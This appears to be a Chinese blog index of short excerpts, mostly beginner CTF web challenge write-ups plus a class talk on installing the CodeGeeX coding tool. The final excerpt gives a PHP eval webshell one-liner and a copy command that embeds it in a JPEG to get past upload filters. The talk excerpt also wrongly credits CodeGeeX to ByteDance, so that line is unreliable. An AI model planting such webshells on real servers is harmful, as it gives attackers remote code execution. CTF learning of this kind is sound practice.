onehangsec

摘要： 今天在写web题时遇到了一道这样的题目，扫描目录后，访问index.phps，找到了源代码 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 由于我这个新手不懂代码 阅读全文

摘要： 本文为本菜鸡大学程序设计课的作业，也是我第一次上台演讲ppt的演讲稿，遂写入我的博客 首先，codegeex是由字节跳动开发的人工智能代码生成工具，它支持python，Java，c++等多个主流编程语言，那么我们如何使用它呢？ 下面我们以vscode为例，进行codegeex的安装 codegeex 阅读全文

摘要： $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } 题目如上 看到函数is_numeric(),由于我并不熟悉这个函数，所以我进行了查询 得知他是用于判断括号中的nu 阅读全文

摘要： 刚刚解决了get问题，打开这道post，发现题目内容一模一样 于是我尝试使用同样的方法去尝试 发现并没有什么用，摸了一下头我想起get和post是两种不同的请求方式 于是我在此时去了解了get和post的区别 知识点：1.get一般我们的参数是写在 ? 后面，用 & 分割 2.GET 方法的参数应该 阅读全文

摘要： 题目就已经很好的说明了问题 分析代码可知，只需上传令what=flag，即可返回flag的值 操作如上：输入/?what=flag,即可上传表单 返回flag如下 拿下！ 阅读全文

摘要： 打开页面，发现需要输入计算结果 但是输入的限制长度为1 此时我想试试通过修改源代码中对输入长度的限制来解决问题 就在我检查源代码时，我直接发现了flag 为什么呢？ 我突然想到，既然我输入了正确的计算结果他就会弹出flag，那么他肯定把flag写在了源代码里，刚开始就一下做出两道题，对刚入门的小白还 阅读全文

摘要： 一打开就出现了一个这个玩意，我们首先按F12观察一下网站的详细信息， 好巧不巧，一打开就看到了flag躺在这里 这是我刷的ctf题目的第一题，属于是信心倍增了 阅读全文

摘要： 需要用到的语句：一句话木马：<?php @eval($_POST['tlover']);?> 合成命令：copy 1.jpg/b + 1.php/a 2.jpg 1.随便找一张图片 ，为它修改一个你喜欢的名字 2.新建一个php文件（同样为它修改一个你喜欢的名字），把一句话木马写在里面（也可以建一个 阅读全文